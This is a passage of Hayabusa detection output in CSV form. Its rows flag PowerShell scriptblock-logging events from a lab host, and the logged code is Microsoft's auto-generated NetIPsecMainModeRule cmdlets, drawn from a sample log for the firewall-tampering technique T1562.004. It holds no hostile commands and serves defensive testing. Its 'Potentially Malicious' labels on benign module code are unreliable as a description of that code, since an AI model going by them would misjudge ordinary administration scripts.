Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 